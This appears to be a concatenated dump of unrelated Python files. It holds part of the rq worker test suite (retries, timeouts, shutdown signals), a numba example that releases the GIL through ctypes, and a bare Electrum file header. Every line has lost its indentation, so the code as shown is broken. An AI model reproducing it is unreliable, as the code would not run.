worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([], queue.job_ids)
def test_retry_interval(self):
"""Retries with intervals are scheduled"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=1, interval=5)
job = queue.enqueue(div_by_zero, retry=retry)
worker = Worker([queue])
registry = queue.scheduled_job_registry
# If job is configured to retry with an interval, it will be scheduled,
# not directly put back in the queue
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.get_status(), JobStatus.SCHEDULED)
self.assertEqual(job.retries_left, 0)
self.assertEqual(len(registry), 1)
self.assertEqual(queue.job_ids, [])
# Scheduled time is roughly 5 seconds from now
scheduled_time = registry.get_scheduled_time(job)
now = datetime.now(timezone.utc)
self.assertTrue(now + timedelta(seconds=4) < scheduled_time < now + timedelta(seconds=6))
def test_total_working_time(self):
"""worker.total_working_time is stored properly"""
queue = Queue()
job = queue.enqueue(long_running_job, 0.05)
worker = Worker([queue])
worker.register_birth()
worker.perform_job(job, queue)
worker.refresh()
# total_working_time should be a little bit more than 0.05 seconds
self.assertGreaterEqual(worker.total_working_time, 0.05)
# in multi-user environments delays might be unpredictable,
# adjust this magic limit accordingly in case it takes even longer to run
self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
def test_disable_default_exception_handler(self):
"""
Job is not moved to FailedJobRegistry when the default exception
handler is disabled.
"""
queue = Queue(name='default', connection=self.testconn)
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=False)
worker.work(burst=True)
registry = FailedJobRegistry(queue=queue)
self.assertTrue(job in registry)
# Job is not added to FailedJobRegistry if
# disable_default_exception_handler is True
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=True)
worker.work(burst=True)
self.assertFalse(job in registry)
def test_custom_exc_handling(self):
"""Custom exception handling."""
def first_handler(job, *exc_info):
job.meta = {'first_handler': True}
job.save_meta()
return True
def second_handler(job, *exc_info):
job.meta.update({'second_handler': True})
job.save_meta()
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
q = Queue()
self.assertEqual(q.count, 0)
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=first_handler)
w.work(burst=True)
# Check the job
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, second_handler])
w.work(burst=True)
# Both custom exception handlers are run
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertTrue(job.meta['second_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, black_hole,
second_handler])
w.work(burst=True)
# second_handler is not run since it's interrupted by black_hole
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
"""Cancelling jobs."""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
job = q.enqueue(create_file, SENTINEL_FILE)
# Here, we cancel the job, so the sentinel file should not be created
self.testconn.delete(job.key)
w = Worker([q])
w.work(burst=True)
assert q.count == 0
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow # noqa
def test_timeouts(self):
"""Worker kills jobs after timeout."""
sentinel_file = '/tmp/.rq_sentinel'
q = Queue()
w = Worker([q])
# Put it on the queue with a timeout value
res = q.enqueue(create_file_after_timeout,
args=(sentinel_file, 4),
job_timeout=1)
try:
os.unlink(sentinel_file)
except OSError as e:
if e.errno == 2:
pass
self.assertEqual(os.path.exists(sentinel_file), False)
w.work(burst=True)
self.assertEqual(os.path.exists(sentinel_file), False)
# TODO: Having to do the manual refresh() here is really ugly!
res.refresh()
self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
"""Ensure that Worker properly sets result_ttl for individual jobs."""
q = Queue()
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertNotEqual(self.testconn.ttl(job.key), 0)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Jobs with result_ttl == -1 don't expire
job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.ttl(job.key), -1)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with result_ttl = 0 gets deleted immediately
job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.get(job.key), None)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
"""Ensure that worker correctly sets job status."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello)
self.assertEqual(job.get_status(), JobStatus.QUEUED)
self.assertEqual(job.is_queued, True)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, False)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, True)
self.assertEqual(job.is_failed, False)
# Failed jobs should set status to "failed"
job = q.enqueue(div_by_zero, args=(1,))
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FAILED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
"""Enqueue dependent jobs only if their parents don't fail"""
q = Queue()
w = Worker([q])
parent_job = q.enqueue(say_hello, result_ttl=0)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
parent_job = q.enqueue(div_by_zero)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
"""Ensure worker.get_current_job() works properly"""
q = Queue()
worker = Worker([q])
job = q.enqueue_call(say_hello)
self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
worker.set_current_job_id(job.id)
self.assertEqual(
worker.get_current_job_id(),
as_text(self.testconn.hget(worker.key, 'current_job'))
)
self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
"""Ensure Worker custom queue class is not global."""
q = CustomQueue()
worker_custom = Worker([q], queue_class=CustomQueue)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.queue_class, CustomQueue)
self.assertEqual(worker_generic.queue_class, Queue)
self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
"""Ensure Worker custom job class is not global."""
q = Queue()
worker_custom = Worker([q], job_class=CustomJob)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.job_class, CustomJob)
self.assertEqual(worker_generic.job_class, Job)
self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
"""Worker processes work, with forking disabled,
then returns."""
fooq, barq = Queue('foo'), Queue('bar')
w = SimpleWorker([fooq, barq])
self.assertEqual(w.work(burst=True), False,
'Did not expect any work on the queue.')
job = fooq.enqueue(say_pid)
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, os.getpid(),
'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
"""SimpleWorker's key must last longer than job.timeout when working"""
queue = Queue('foo')
worker = SimpleWorker([queue])
job_timeout = 300
job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
worker.work(burst=True)
job.refresh()
self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
"""Prepare job execution does the necessary bookkeeping."""
queue = Queue(connection=self.testconn)
job = queue.enqueue(say_hello)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Updates worker statuses
self.assertEqual(worker.get_state(), 'busy')
self.assertEqual(worker.get_current_job_id(), job.id)
def test_prepare_job_execution_inf_timeout(self):
"""Prepare job execution handles infinite job timeout"""
queue = Queue(connection=self.testconn)
job = queue.enqueue(long_running_job,
args=(1,),
job_timeout=-1)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Score in queue is +inf
self.assertEqual(self.testconn.zscore(registry.key, job.id), float('Inf'))
def test_work_unicode_friendly(self):
"""Worker processes work with unicode description, then quits."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Adam',
description='你好 世界!')
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, 'Hi there, Adam!')
self.assertEqual(job.description, '你好 世界!')
def test_work_log_unicode_friendly(self):
"""Worker process work with unicode or str other than pure ascii content,
logging work properly"""
q = Queue("foo")
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
"""Test Pause Worker Execution"""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
q.enqueue(create_file, SENTINEL_FILE)
w = Worker([q])
suspend(self.testconn)
w.work(burst=True)
assert q.count == 1
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
resume(self.testconn)
w.work(burst=True)
assert q.count == 0
self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
q = Queue()
for _ in range(5):
q.enqueue(do_nothing)
w = Worker([q])
# This suspends the worker from working for 2 seconds
suspend(self.testconn, 2)
# So when this burst of work happens the queue should remain at 5
w.work(burst=True)
assert q.count == 5
sleep(3)
# The suspension should be expired now, and a burst of work should now clear the queue
w.work(burst=True)
assert q.count == 0
def test_worker_hash_(self):
"""Workers are hashed by their .name attribute"""
q = Queue('foo')
w1 = Worker([q], name="worker1")
w2 = Worker([q], name="worker2")
w3 = Worker([q], name="worker1")
worker_set = set([w1, w2, w3])
self.assertEqual(len(worker_set), 2)
def test_worker_sets_birth(self):
"""Ensure worker correctly sets worker birth date."""
q = Queue()
w = Worker([q])
w.register_birth()
birth_date = w.birth_date
self.assertIsNotNone(birth_date)
self.assertEqual(type(birth_date).__name__, 'datetime')
def test_worker_sets_death(self):
"""Ensure worker correctly sets worker death date."""
q = Queue()
w = Worker([q])
w.register_death()
death_date = w.death_date
self.assertIsNotNone(death_date)
self.assertIsInstance(death_date, datetime)
def test_clean_queue_registries(self):
"""worker.clean_registries sets last_cleaned_at and cleans registries."""
foo_queue = Queue('foo', connection=self.testconn)
foo_registry = StartedJobRegistry('foo', connection=self.testconn)
self.testconn.zadd(foo_registry.key, {'foo': 1})
self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
bar_queue = Queue('bar', connection=self.testconn)
bar_registry = StartedJobRegistry('bar', connection=self.testconn)
self.testconn.zadd(bar_registry.key, {'bar': 1})
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
worker = Worker([foo_queue, bar_queue])
self.assertEqual(worker.last_cleaned_at, None)
worker.clean_registries()
self.assertNotEqual(worker.last_cleaned_at, None)
self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
# worker.clean_registries() only runs once every 15 minutes
# If we add another key, calling clean_registries() should do nothing
self.testconn.zadd(bar_registry.key, {'bar': 1})
worker.clean_registries()
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
"""Workers should run maintenance tasks on startup and every hour."""
queue = Queue(connection=self.testconn)
worker = Worker(queue)
self.assertTrue(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow()
self.assertFalse(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
"""Worker calls clean_registries when run."""
queue = Queue(connection=self.testconn)
registry = StartedJobRegistry(connection=self.testconn)
self.testconn.zadd(registry.key, {'foo': 1})
worker = Worker(queue, connection=self.testconn)
worker.work(burst=True)
self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
"""Dependencies added while the job gets finished shouldn't get lost."""
# This patches the enqueue_dependents to enqueue a new dependency AFTER
# the original code was executed.
orig_enqueue_dependents = Queue.enqueue_dependents
def new_enqueue_dependents(self, job, *args, **kwargs):
orig_enqueue_dependents(self, job, *args, **kwargs)
if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
Queue._add_enqueue = None
Queue().enqueue_call(say_hello, depends_on=job)
Queue.enqueue_dependents = new_enqueue_dependents
q = Queue()
w = Worker([q])
with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
parent_job = q.enqueue(say_hello, result_ttl=0)
Queue._add_enqueue = parent_job
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
# The created spy checks two issues:
# * before the fix of #739, 2 of the 3 jobs were executed due
# to the race condition
# * during the development another issue was fixed:
# due to a missing pipeline usage in Queue.enqueue_job, the job
# which was enqueued before the "rollback" was executed twice.
# So before that fix the call count was 4 instead of 3
self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack."""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack -- even if the job errored"""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
"""Check that log_result_lifespan True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
"""Check that log_result_lifespan False causes job lifespan to not be logged."""
q = Queue()
class TestWorker(Worker):
log_result_lifespan = False
w = TestWorker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
"""Check that log_job_description True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
"""Check that log_job_description False causes job lifespan to not be logged."""
q = Queue()
w = Worker([q], log_job_description=False)
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
q = Queue()
w = Worker([q])
w.version = '0.0.0'
w.register_birth()
self.assertEqual(w.version, '0.0.0')
w.refresh()
self.assertEqual(w.version, '0.0.0')
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.version, '0.0.0')
def test_python_version(self):
python_version = sys.version
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(w.python_version, python_version)
# now patching version
python_version = 'X.Y.Z.final' # dummy version
self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless
w2 = Worker([q])
w2.python_version = python_version
w2.register_birth()
self.assertEqual(w2.python_version, python_version)
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w2.key)
self.assertEqual(worker.python_version, python_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
time.sleep(time_to_wait)
os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
def setUp(self):
# we want tests to fail if signals are ignored and the work remains
# running, so set an alarm to kill them after X seconds
self.killtimeout = 15
signal.signal(signal.SIGALRM, self._timeout)
signal.alarm(self.killtimeout)
def _timeout(self, signal, frame):
raise AssertionError(
"test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
)
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
@slow
def test_idle_worker_warm_shutdown(self):
"""worker with no ongoing job receiving single SIGTERM signal and shutting down"""
w = Worker('foo')
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(1)
self.assertFalse(w._stop_requested)
@slow
def test_working_worker_warm_shutdown(self):
"""worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_warm'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(2)
self.assertFalse(p.is_alive())
self.assertTrue(w._stop_requested)
self.assertTrue(os.path.exists(sentinel_file))
self.assertIsNotNone(w.shutdown_requested_date)
self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')
@slow
def test_working_worker_cold_shutdown(self):
"""Busy worker shuts down immediately on double SIGTERM signal"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_cold'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), True))
p.start()
self.assertRaises(SystemExit, w.work)
p.join(1)
self.assertTrue(w._stop_requested)
self.assertFalse(os.path.exists(sentinel_file))
shutdown_requested_date = w.shutdown_requested_date
self.assertIsNotNone(shutdown_requested_date)
self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')
@slow
def test_work_horse_death_sets_job_failed(self):
"""worker with an ongoing job whose work horse dies unexpectadly (before
completing the job) should set the job's status to FAILED
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
p.start()
w.monitor_work_horse(job, queue)
job_status = job.get_status()
p.join(1)
self.assertEqual(job_status, JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
@slow
def test_work_horse_force_death(self):
"""Simulate a frozen worker that doesn't observe the timeout properly.
Fake it by artificially setting the timeout of the parent process to
something much smaller after the process is already forked.
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
job.timeout = 5
w.job_monitoring_interval = 1
now = utcnow()
w.monitor_work_horse(job, queue)
fudge_factor = 1
total_time = w.job_monitoring_interval + 65 + fudge_factor
self.assertTrue((utcnow() - now).total_seconds() < total_time)
self.assertEqual(job.get_status(), JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
def schedule_access_self():
q = Queue('default', connection=get_current_connection())
q.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
def setUp(self):
super(TestWorkerSubprocess, self).setUp()
db_num = self.testconn.connection_pool.connection_kwargs['db']
self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num
def test_run_empty_queue(self):
"""Run the worker in its own process with an empty queue"""
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
def test_run_access_self(self):
"""Schedule a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
def test_run_scheduled_access_self(self):
"""Schedule a job that schedules a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(schedule_access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
def setUp(self):
super(HerokuWorkerShutdownTestCase, self).setUp()
self.sandbox = '/tmp/rq_shutdown/'
os.makedirs(self.sandbox)
def tearDown(self):
shutil.rmtree(self.sandbox, ignore_errors=True)
@slow
def test_immediate_shutdown(self):
"""Heroku work horse shutdown with immediate (0 second) kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
self.assertTrue(stderr.endswith(err), stderr)
@slow
def test_1_sec_shutdown(self):
"""Heroku work horse shutdown with 1 second kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
time.sleep(0.1)
self.assertEqual(p.exitcode, None)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGALRM)'
self.assertTrue(stderr.endswith(err), stderr)
@slow
def test_shutdown_double_sigrtmin(self):
"""Heroku work horse shutdown with long delay but SIGRTMIN sent twice"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
# we have to wait a short while, otherwise the second signal won't be processed.
time.sleep(0.1)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
self.assertTrue(stderr.endswith(err), stderr)
@mock.patch('rq.worker.logger.info')
def test_handle_shutdown_request(self, mock_logger_info):
"""Mutate HerokuWorker so _horse_pid refers to an artificial process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
path = os.path.join(self.sandbox, 'shouldnt_exist')
p = Process(target=create_file_after_timeout, args=(path, 2))
p.start()
self.assertEqual(p.exitcode, None)
w._horse_pid = p.pid
w.handle_warm_shutdown_request()
p.join(2)
# would expect p.exitcode to be -34
self.assertEqual(p.exitcode, -34)
self.assertFalse(os.path.exists(path))
mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)
def test_handle_shutdown_request_no_horse(self):
"""Mutate HerokuWorker so _horse_pid refers to non existent process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
w._horse_pid = 19999
w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
def setUp(self):
super(TestExceptionHandlerMessageEncoding, self).setUp()
self.worker = Worker("foo")
self.worker._exc_handlers = []
# Mimic how exception info is actually passed forwards
try:
raise Exception(u"💪")
except Exception:
self.exc_info = sys.exc_info()
def test_handle_exception_handles_non_ascii_in_exception_message(self):
"""worker.handle_exception doesn't crash on non-ascii in exception message."""
self.worker.handle_exception(Mock(), *self.exc_info)
|
multithread.py
|
# -*- coding: utf-8 -*-
"""
Example of multithreading by releasing the GIL through ctypes.
"""
from __future__ import print_function, division, absolute_import
from timeit import repeat
import threading
from ctypes import pythonapi, c_void_p
from math import exp
import numpy as np
from numba import jit, void, double
nthreads = 2
size = int(1e6)  # integer size, so it can be passed directly to np.random.rand
def timefunc(correct, s, func, *args, **kwargs):
print(s.ljust(20), end=" ")
# Make sure the function is compiled before we start the benchmark
res = func(*args, **kwargs)
if correct is not None:
assert np.allclose(res, correct)
# time it
print('{:>5.0f} ms'.format(min(repeat(lambda: func(*args, **kwargs),
number=5, repeat=2)) * 1000))
return res
def make_singlethread(inner_func):
def func(*args):
length = len(args[0])
result = np.empty(length, dtype=np.float64)
inner_func(result, *args)
return result
return func
def make_multithread(inner_func, numthreads):
def func_mt(*args):
length = len(args[0])
result = np.empty(length, dtype=np.float64)
args = (result,) + args
chunklen = (length + 1) // numthreads
chunks = [[arg[i * chunklen:(i + 1) * chunklen] for arg in args]
for i in range(numthreads)]
# You should make sure inner_func is compiled at this point, because
# the compilation must happen on the main thread. This is the case
# in this example because we use jit().
threads = [threading.Thread(target=inner_func, args=chunk)
for chunk in chunks[:-1]]
for thread in threads:
thread.start()
# the main thread handles the last chunk
inner_func(*chunks[-1])
for thread in threads:
thread.join()
return result
return func_mt
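# Each thread writes to a disjoint slice of the preallocated `result` array,
# so no locking is required; the parallel speedup only materializes because
# the compiled inner_func releases the GIL (see savethread/restorethread below).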
savethread = pythonapi.PyEval_SaveThread
savethread.argtypes = []
savethread.restype = c_void_p
restorethread = pythonapi.PyEval_RestoreThread
restorethread.argtypes = [c_void_p]
restorethread.restype = None
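# PyEval_SaveThread releases the GIL and returns the calling thread's state as
# an opaque pointer; PyEval_RestoreThread takes that pointer back and
# re-acquires the GIL. Bracketing the numeric loop with these two calls lets
# the other worker threads execute the same compiled function concurrently.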
def inner_func(result, a, b):
threadstate = savethread()
for i in range(len(result)):
result[i] = exp(2.1 * a[i] + 3.2 * b[i])
restorethread(threadstate)
signature = void(double[:], double[:], double[:])
inner_func_nb = jit(signature, nopython=True)(inner_func)
func_nb = make_singlethread(inner_func_nb)
func_nb_mt = make_multithread(inner_func_nb, nthreads)
def func_np(a, b):
return np.exp(2.1 * a + 3.2 * b)
a = np.random.rand(size)
b = np.random.rand(size)
c = np.random.rand(size)
correct = timefunc(None, "numpy (1 thread)", func_np, a, b)
timefunc(correct, "numba (1 thread)", func_nb, a, b)
timefunc(correct, "numba (%d threads)" % nthreads, func_nb_mt, a, b)
|
network.py
|
# Electrum - Lightweight Bitcoin Client
